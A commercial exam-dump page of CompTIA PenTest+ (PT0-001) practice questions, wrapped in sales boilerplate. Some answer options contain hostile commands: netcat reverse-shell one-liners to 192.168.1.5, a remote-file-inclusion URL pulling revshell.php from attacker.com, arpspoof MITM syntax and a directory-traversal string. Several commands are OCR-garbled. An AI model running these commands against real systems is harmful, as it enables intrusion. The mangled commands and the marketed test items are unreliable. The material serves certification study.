Summer Special Sales Coupon - 55% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: c4s55disc

PT0-001 PDF

$49.5

$109.99

3 Months Free Update

  • Printable Format
  • Value of Money
  • 100% Pass Assurance
  • Verified Answers
  • Researched by Industry Experts
  • Based on Real Exams Scenarios
  • 100% Real Questions

PT0-001 PDF + Testing Engine

$79.2

$175.99

3 Months Free Update

  • Exam Name: CompTIA PenTest+ Exam
  • Last Update: Aug 14, 2022
  • Questions and Answers: 294
  • Free Real Questions Demo
  • Recommended by Industry Experts
  • Best Economical Package
  • Immediate Access

PT0-001 Engine

$59.4

$131.99

3 Months Free Update

  • Best Testing Engine
  • One Click installation
  • Recommended by Teachers
  • Easy to use
  • 3 Modes of Learning
  • State of Art Technology
  • 100% Real Questions included

PT0-001 CompTIA PenTest+ Exam Questions and Answers

Question # 6

A recent vulnerability scan of all web servers in an environment offers the following results:

PT0-001 question answer

Taking a risk-based approach, which of the following is the BEST order to approach remediation based on exposure?

A.

Unrestricted file upload, clickjacking, verbose server banner, SQL injection

B.

Unrestricted file upload, SQL injection, clickjacking, verbose server banner

C.

Clickjacking, unrestricted file upload, verbose server banner, SQL injection

D.

SQL injection, unrestricted file upload, clickjacking, verbose server banner

E.

SQL injection, clickjacking, unrestricted file upload, verbose server banner

Full Access
Question # 7

Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

A.

To report indicators of compromise

B.

To report findings that cannot be exploited

C.

To report critical findings

D.

To report the latest published exploits

E.

To update payment information

F.

To report a server that becomes unresponsive

G.

To update the statement o( work

Full Access
Question # 8

Prior to a security assessment of a company's user population via spear phishing, which of the following is the MOST appropriate method to de-escalate any incidents or consequences?

A.

Determine the appropriate format and content of the spear-phishing emails.

B.

Send follow-up communication to spear-phishing targets to notify of the assessment.

C.

Carefully prioritize the list of targeted users, excluding high value targets.

D.

Provide limited but necessary communication prior to the assessment.

Full Access
Question # 9

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20

NETMASK: 255.255.255.0

DEFAULT GATEWAY: 192.168.1.254

DHCP: 192.168.1.253

DNS: 192.168.10.10, 192.168.20.10

Which of the following commands should the malicious user execute to perform the MITM attack?

A.

arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B.

arpspoof -t 192.168.1.20 192.168.1.254

C.

arpspoof -c both -t 192.168.1.20 192.168.1.253

D.

arpspoof -r -t 192 .168.1.253 192.168.1.20

Full Access
Question # 10

A company has engaged a penetration tester to perform an assessment for an application that resides in the company’s DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester’s IP address be whitelisted?

A.

WAF

B.

HIDS

C.

NIDS

D.

DLP

Full Access
Question # 11

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next

step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the

following would BEST meet this goal?

A.

Perform an HTTP downgrade attack.

B.

Harvest the user credentials to decrypt traffic.

C.

Perform an MITM attack.

D.

Implement a CA attack by impersonating trusted CAs.

Full Access
Question # 12

An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

A.

Network-attached printer

B.

Power-over-Ethernet injector

C.

User workstation

D.

Wireless router

Full Access
Question # 13

When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?

A.

Development of custom zero-day exploits and tools

B.

Leveraging the dark net for non-attribution

C.

Tenacity and efficacy of social engineering attacks

D.

Amount of bandwidth available for DoS attacks

Full Access
Question # 14

A penetration tester discovers SNMP on some targets. Which of the following should the penetration tester try FIRST?

A.

Sniff SNMP traffic.

B.

Use default credentials.

C.

Upload a new config file.

D.

Conduct a MITM.

Full Access
Question # 15

Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?

A.

Penetration test findings often contain company intellectual property

B.

Penetration test findings could lead to consumer dissatisfaction if made pubic

C.

Penetration test findings are legal documents containing privileged information

D.

Penetration test findings can assist an attacker in compromising a system

Full Access
Question # 16

A penetration tester identifies prebuilt exploit code containing Windows imports for VirtualAllocEx and LoadLibraryA functions. Which of the following techniques is the exploit code using?

A.

DLL hijacking

B.

DLL sideloading

C.

DLL injection

D.

DLL function hooking

Full Access
Question # 17

After successfully enumerating users on an Active Directory domain controller using enum4linux a penetration tester wants to conduct a password-guessing attack Given the below output:

PT0-001 question answer

Which of the following can be used to extract usernames from the above output prior to conducting the attack?

A.

cat enum41inux_output.txt > grep -v user I sed ‘s/\[//' I sed ‘s/\]//' 2> usernames.txt

B.

grep user enuza41inux_output.txt I awk '{print $1}' | cut -d[ -£2 I cut -d] -f1 > username.txt

C.

grep -i rid v< enura.41inux_output. txt' | cut -d: -£2 i cut -d] -f1 > usernames. txt

D.

cut -d: -f2 enum41inux_output.txt | awk '{print S2}' I cut -d: -f1 > usernaraes.txt

Full Access
Question # 18

During the information gathering phase, a penetration tester discovers a spreadsheet that contains a domain administrator's credentials. In addition, port scanning reveals that TCP port 445 was open on multiple hosts. Which of the following methods would BEST leverage this information?

A.

telnet [target IP] 445

B.

ncat [target IP] 445

C.

nbtstat -a [targetIP] 445

D.

psexec [target IP]

Full Access
Question # 19

Which of the following can be used to perform online password attacks against RDP?

A.

Hashcat

B.

John the Rippef

C.

Aircrack-ng

D.

Ncrack

Full Access
Question # 20

When communicating the findings of a network vulnerability scan to a client's IT department which of the following metrics BEST prioritize the severity of the findings? (Select TWO)

A.

Threat map statistics

B.

CVSS scores

C.

Versions of affected software

D.

Media coverage prevalence

E.

Impact criticality

F.

Ease of remediation

Full Access
Question # 21

A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST create a potentially destructive outcome against device?

A.

Launch an SNMP password brute force attack against the device.

B.

Lunch a Nessus vulnerability scan against the device.

C.

Launch a DNS cache poisoning attack against the device.

D.

Launch an SMB exploit against the device.

Full Access
Question # 22

After successfully exploiting a local file inclusion vulnerability within a web application a limited reverse shell is spawned back to the penetration tester's workstation Which of the following can be used to escape the limited shell and create a fully functioning TTY?

A.

per1 -e ' : set shall=/bin/bash:shell'

B.

php -r ,Sshell=f3hellopen("/bin/bash-);exec($9he:i)'

C.

bash -i >fi /dev/localhosc Oil

D.

python -c 'import pty;pcy.3pawn("/bin/bash")'

Full Access
Question # 23

Performance based

You are a penetration Inter reviewing a client's website through a web browser.

Instructions:

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate source or cookies.

PT0-001 question answer

PT0-001 question answer

PT0-001 question answer

PT0-001 question answer

PT0-001 question answer

PT0-001 question answer

PT0-001 question answer

PT0-001 question answer

Full Access
Question # 24

A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

A.

Transition the application to another port

B.

Filter port 443 to specific IP addresses

C.

Implement a web application firewall

D.

Disable unneeded services.

Full Access
Question # 25

A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?

A.

Redirect the user with a CSRF.

B.

Launch the website in an iFRAME.

C.

Pull server headers.

D.

Capture and replay a session ID.

Full Access
Question # 26

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

A.

Implement a blacklist.

B.

Block URL redirections.

C.

Double URL encode the parameters.

D.

Stop external calls from the application.

Full Access
Question # 27

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO)

A.

nc 192.168.1.5 44444

B.

nc -nlvp 4444 -e /bin/sh

C.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.1.5 44444>/tmp /f

D.

nc -e /bin/sh 192.168.1.5 4444

E.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.1.5 444444>/tmp /f

F.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.5.1 44444>/tmp /f

Full Access
Question # 28

A penetration tester directly connects to an internal network. Which of the following exploits would work BEST

for quick lateral movement within an internal network?

A.

Crack password hashes in /etc/shadow for network authentication.

B.

Launch dictionary attacks on RDP.

C.

Conduct a whaling campaign.

D.

Poison LLMNR and NBNS requests.

Full Access
Question # 29

While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?

A.

Levels of difficulty to exploit identified vulnerabilities

B.

Time taken to accomplish each step

C.

Risk tolerance of the organization

D.

Availability of patches and remediations

Full Access
Question # 30

Which of the following is the purpose of an NDA?

A.

Outlines the terms of confidentiality between both parties

B.

Outlines the boundaries of which systems are authorized for testing

C.

Outlines the requirements of technical testing that are allowed

D.

Outlines the detailed configuration of the network

Full Access
Question # 31

D18912E1457D5D1DDCBD40AB3BF70D5D

Which of the following is the MOST comprehensive type of penetration test on a network?

A.

Black box

B.

White box

C.

Gray box

D.

Red team

E.

Architecture review

Full Access
Question # 32

Instructions:

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

PT0-001 question answer

Full Access
Question # 33

A penetration tester has SSH access to a Linux server that is exposed to the internet and has access to a corporate internal network. This server, with IP address 200.111.111.9, only has port TCP 22 externally opened. The penetration tester also discovered the internal IP address 192.168.1.5 from a Windows server. Which of the following steps should the penetration tester follow to open an RDP connection to this Windows server and to try to log on?

A.

Connect to the Linux server using # ssh 200.111.111.9, establish an RDP connection to the 192.168.1.5 address.

B.

Connect to the Windows server using # ssh -L 3389:200.111.111.9:22 192.168.1.5.

C.

Connect to the Linux server using # ssh -L 3389:192.168.1.5:3389 200 .111.111.9; RDP to localhost address, port 3389.

D.

Connect to the Windows server using # ssh -L 22:200.111.111.9:3389 192.168.1.5.

Full Access
Question # 34

A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.

The penetration tester observes the following response:

PT0-001 question answer

Based on the response, which of the following vulnerabilities exists?

A.

SQL injection

B.

Session hijacking

C.

Command injection

D.

XSS/XSRF

Full Access
Question # 35

A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?

A)

PT0-001 question answer

B)

PT0-001 question answer

C)

PT0-001 question answer

D)

PT0-001 question answer

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Full Access
Question # 36

A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

A.

Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.

B.

Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof--of-concept to management.

C.

Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company.

D.

Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

Full Access
Question # 37

Which of the following should a penetration tester verify prior to testing the login and permissions management for a web application that is protected by a CDN-based WAF?

A.

If an NDA is signed with the CDN company

B.

If the SSL certificates for the web application are valid

C.

If a list of the applicable WAF rules was obtained

D.

If the IP addresses for the penetration tester are whitelisted on the WAF

Full Access
Question # 38

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?

A.

The biometric device is tuned more toward false positives

B.

The biometric device is configured more toward true negatives

C.

The biometric device is set to fail closed

D.

The biometnc device duplicated a valid user's fingerpnnt.

Full Access
Question # 39

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions

during ingest into a Windows application. Before beginning to test the application, which of the following should

the assessor request from the organization?

A.

Sample SOAP messages

B.

The REST API documentation

C.

A protocol fuzzing utility

D.

An applicable XSD file

Full Access
Question # 40

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?

A.

Elicitation attack

B.

Impersonation attack

C.

Spear phishing attack

D.

Drive-by download attack

Full Access
Question # 41

A penetration tester is exploiting the use of default public and private community strings Which of the following protocols is being exploited?

A.

SMTP

B.

DNS

C.

SNMP

D.

HTTP

Full Access
Question # 42

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by

physically engaging them?

A.

Locating emergency exits

B.

Preparing a pretext

C.

Shoulder surfing the victim

D.

Tailgating the victim

Full Access
Question # 43

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd

Which of the following attack types is MOST likely to be the vulnerability?

A.

Directory traversal

B.

Cross-site scripting

C.

Remote file inclusion

D.

User enumeration

Full Access
Question # 44

Which of the following excerpts would come from a corporate policy?

A.

Employee passwords must contain a minimum of eight characters, with one being alphanumeric.

B.

The help desk can be reached at 800-passwd1 to perform password resets.

C.

Employees must use strong passwords for accessing corporate assets.

D.

The corporate systems must store passwords using the MD5 hashing algorithm.

Full Access